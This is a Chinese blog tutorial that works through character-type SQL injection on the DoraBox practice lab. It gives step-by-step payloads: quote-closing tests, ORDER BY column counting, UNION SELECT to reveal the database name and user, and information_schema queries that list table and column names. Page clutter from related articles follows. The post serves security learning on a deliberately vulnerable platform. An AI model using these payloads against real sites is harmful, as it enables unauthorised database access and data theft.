DoraBox——SQL注入篇2--字符型

最新推荐文章于 2024-05-15 23:16:18 发布
最新推荐文章于 2024-05-15 23:16:18 发布
阅读量243 收藏 2
点赞数 1
分类专栏: 安全 文章标签: sql 数据库 sqlite
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45780190/article/details/120370699
版权

DoraBox ——掌握常见漏洞攻防

SQL注入篇2–字符型

1.判断是否存在注入,注入是字符型还是数字型(其实我们已经知道注入是数字类型,但为了更好的学习,按步骤进行学习)

当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。

接着我们分别输入

1 and 1=1
1 and 1=2

在这里插入图片描述
在这里插入图片描述

以上均不能查到任何表

输入字符类型

1' and '1'='1
1' and '1'='2

在这里插入图片描述

均不能查到任何表

输入以下字符类型

1' or '1'='1
1' or '1'='2

在这里插入图片描述
在这里插入图片描述

通过这里我们可以判断该地的注入输入字符类型。

2.猜解SQL查询语句中的字段数

输入1’ order by 2 #,查询成功:(注意此处的语句,#是注释后面的单引号,前面的’是闭合SQL的“,一定要记住ORDERBY 后加数字不是字符 )

当我们输入字段为3时,没有出现报错

在这里插入图片描述

当我们输入字段为时,发生报错,由此可以看出有3个字段

3.确定显示的字段位置
-1'  union select 1,2,3 #

在这里插入图片描述

从结果可以看出来字段显示的位置是2和3.

4.获取当前的数据库名和用户名

-1' union select 1,database(),user()#

在这里插入图片描述

通过回显可以看到具体数据库和用户

5.获取数据库中的表名
-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='pentest' #

在这里插入图片描述

数据库表名为:account,news

6.获取表中的字段名
-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='account' #

在这里插入图片描述

account表中有id,rest,own三个字段

-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='news' #

在这里插入图片描述

news 表中有id,title,content三个字段

kb2414
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入原理-字符注入
T1ngSh0w的博客
09-13 8990
SQL注入原理-字符注入
SQL注入分类,一看你就明白了。SQL注入点_SQL注入_SQL注入有几种_SQL注入点分类
2201_75735270的博客
01-20 996
根据输入的 「参数」类,可以将SQL注入分为两大类: 「数值注入、 「字符注入
SQL注入常见类注入点的判断
最新发布
qq_64395221的博客
05-15 959
字符注入的时候我们需要逃逸单引号,但是php提供了魔术引号开关magic_quotes_gpc和addslashes(),iconv()函数作为防御,特点是自动给传入的参数如单引号,双引号,反斜杠,%00前面加一个反斜杠,进行转义,避免单引号进行逃逸。id=1这种形式的url,这个时候我们输入and 1=1与and 1=2,进行判定看是否会出现and 1=1回显正常,and 1=2回显不正常的情况。sql语句的变量并不是直接传入的变量,而是通过其它的方式保存到了数据库,形成二次注入
DoraBoxSQL注入
justoneu的博客
06-24 716
什么是SQL注入?:所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意的)SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句 字符与数字的区别在于,变量是否用单引号包裹,不闭合单引号则无法查询结果。 搜索SQL注入 一些网站为了方便用户查找网站的资源,提供了...
SQL注入——字符union注入
heyingcheng的博客
03-04 578
使用union注入拿到靶机中数据库里的所有用户名和密码查询语句:select 列名 from 表名 where 限定语句以sql-labs中的less-1为例。
CTF学习笔记2:iwebsec-SQL注入漏洞-01-数字注入
lifeng_dc的博客
01-22 3304
提示:本篇为最简单的SQL注入入门,是在自己本地虚拟机的靶场上练习,为的是了解安全防御技术。切勿在未经授权的情况下,测试或攻击他人网站或系统,否则将承担法律责任!请学习《网络安全法》。 一、解题过程 用到的工具:Chrome浏览器和HackerBar插件 (一)题目概览 1.题目路径 2.HackerBar使用 3.测试结果集列数为3列 ?id=1 order by 4 4.给id传递-1再用union select查询自己想要的数据 (1)取得当前应用的数据库名 ?id=-1 union sele
SQL注入天书 sqli-labs
01-11
SQL注入天书 sqli-labs》是一本深入探讨SQL注入技术的专业资料,结合了sqli-labs实战平台,旨在帮助读者强化对SQL注入的理解和防御能力。SQL注入是一种常见的网络安全漏洞,攻击者通过在输入数据中嵌入恶意SQL代码...
SQL注入-概述-ppt.pptx
10-27
SQL注入中,一些特殊字符如单引号(')、双引号(")、分号(;)、百分号(%)、井号(#)、双减号(--)、双下划线(__)等被用来构造恶意的SQL片段。例如,单引号常用于终止字符串,而分号可以用于分隔多个SQL...
物流管理系统毕业设计——基于Visual-C++-6.0和SQL-Server-2000编写.pdf
07-01
物流管理系统毕业设计——基于Visual-C++-6.0和SQL-Server-2000编写.pdf物流管理系统毕业设计——基于Visual-C++-6.0和SQL-Server-2000编写.pdf物流管理系统毕业设计——基于Visual-C++-6.0和SQL-Server-2000编写....
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类SQL注入 支持Bool盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
MySQL 面试题-SQL注入篇.docx
09-17
- 数值字符注入:根据输入参数的类区分,字符注入又分为单引号和双引号注入。 4. SQL注入漏洞的修复: - 输入验证增强:自定义验证规则,限制非法字符,确保输入的安全性。 - 使用参数化查询和预编译...
SQL字符注入漏洞.pdf
07-18
配套博客:https://blog.csdn.net/qq_41739364/article/details/94025729
SQL注入】数字注入 & 字符注入
07-12 2266
SQL-数字&字符
注入SQL漏洞——数字注入
weixin_44749329的博客
03-31 1824
Pikachu——SQL-Inject-数字注入 接下来会给大家来演示一下pikachu的案例进行演示 首先来打开pikachu,找到其中的数字注入 里面有一个post方式提出的一个请求,右边有一个下拉的一个框,点击“查询” 这里其实是一个输入点,是要查询这个输入点是否存在一个注入漏洞 第二步 首先要去想象这个功能提交的参数到了后台要如何去操作,然后我们可以打开记事本,来想...
SQL数字注入
kuiguowei的博客
01-12 9597
SQL注入攻击的产生 当应用程序使用输入内容来构造动态SQL语句以访问数据库时,会发生SQL注入攻击。 如果代码使用存储过程,而这些存储过程作为包含未筛选的用户输入的字符串来传递,也会发生SQL注入SQL注入可能导致攻击者使用应用程序登陆在数据库中执行命令。相关的SQL注入可以通过测试工具pangolin进行。如果应用程序使用特权过高的帐户连接到数据库,这种问题会变得很严重。在
DoraBox 漏洞练习平台
weixin_30477797的博客
04-29 1070
项目地址: https://github.com/gh0stkey/DoraBox SQL注入 SQLi 数字 判断表中有多少列 http://127.0.0.1/DoraBox/sql_injection/sql_num.php?id=1%20order%20by%201&submit=submit 依次增大order by 后面的值,直到报错,报错...
SQL 字符注入
MZa1213123的博客
03-02 4394
CTFHub SQL 字符注入 可以看到我们输入的数据会被单引号所括上 尝试正常的 1 and 1=2 发现没有报错 还是有回显 字符的 1 and 1=2 就相当于只是字符串 并没有发挥其表达式的作用所以这就没有产生错误回显 (不太明白为什么 sql 还是会查询到id = 1 的数据) 这时候我们添加 ' 手动闭合前一个 sql 语句然后再拼接上我们的 sql 语句进行测试 整个的 sql 语句大概是 $ sql = "select Data from table_name .
Sql注入的分类:数字+字符
weixin_30496431的博客
07-25 661
Sql注入: 就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。通过构造恶意的输入,使数据库执行恶意命令,造成数据泄露或者修改内容等,以达到攻击的目的。主要是由于应用程序对用户的输入没有进行严格的过滤而造成的。 一、万能密码 在说sql注入分类之前,先来看一下万能密码的构成原理。万能密码是由于某些程序,通过采用判断sql语句查询...
DoraBox-sql注入数字
W小哥
12-29 539
第一步:打开目标网站 在框中我们随便输入1 第二步:and 1=1;and 1=2 测试注入点 1=1是永真表达式 而SELECT * FROM news WHERE id = 1 and 1=1只有两个语句SELECT * FROM news WHERE id = 1与1=1全都都为真,页面才会正常显示 1=2是永假表达式 而SELECT * FROM news WHERE id = 1...
SQL注入实战:sqli-labs实验详解
本实验手册主要针对基于单引号的字符联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库信息的步骤。” SQL注入是一种常见的网络安全漏洞,它允许攻击者通过输入恶意SQL代码来获取、修改、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值